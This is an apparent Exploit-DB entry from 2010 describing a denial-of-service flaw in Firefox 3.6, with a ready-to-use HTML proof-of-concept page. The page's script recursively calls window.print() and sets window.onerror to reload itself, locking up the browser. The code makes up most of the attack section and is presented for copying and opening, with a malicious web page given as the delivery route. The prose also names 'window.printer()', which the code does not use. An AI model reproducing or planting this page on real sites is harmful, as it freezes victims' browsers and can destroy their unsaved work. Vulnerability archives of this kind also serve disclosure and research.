Mozilla Firefox 3.6 - Denial of Service (1)

EDB-ID:

11432

CVE:





Platform:

Windows

Date:

2010-02-13


                     =======================================================================

                      Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service Exploit
                     =======================================================================

                                                     by

                                            Asheesh Kumar Mani Tripathi


# code by Asheesh kumar Mani Tripathi

# email informationhacker08@gmail.com

# company       aksitservices

# Credit by Asheesh Anaconda


#Download www.mozilla.com/firefox


#Background

Mozilla Firefox is a popular internet browser. .....:)

#Vulnerability
This bug is a typical result of multitudinous  loop.  
The flaw exists when the attacker put window.printer() funtion 
in multitudinous loop.User interaction is required to 
exploit this vulnerability in that the target must visit a malicious 
web page.


#Impact
Browser doesn't respond any longer to any user input, all tabs are no 
longer accessible, your work if any   might be lost.



#Proof of concept
copy the code in text file and save as "asheesh.html" open in Mozilla Firefox

========================================================================================================================

                                                           asheesh.html
========================================================================================================================

<html>
<title>asheesh kumar mani tripathi</title>

<script>


function 
asheesh()
{
window.onerror=new Function("history.go(0)");
window.print();
asheesh();


}
asheesh();
</script>

</html>
                                                           
========================================================================================================================


#If you have any questions, comments, or concerns, feel free to contact me.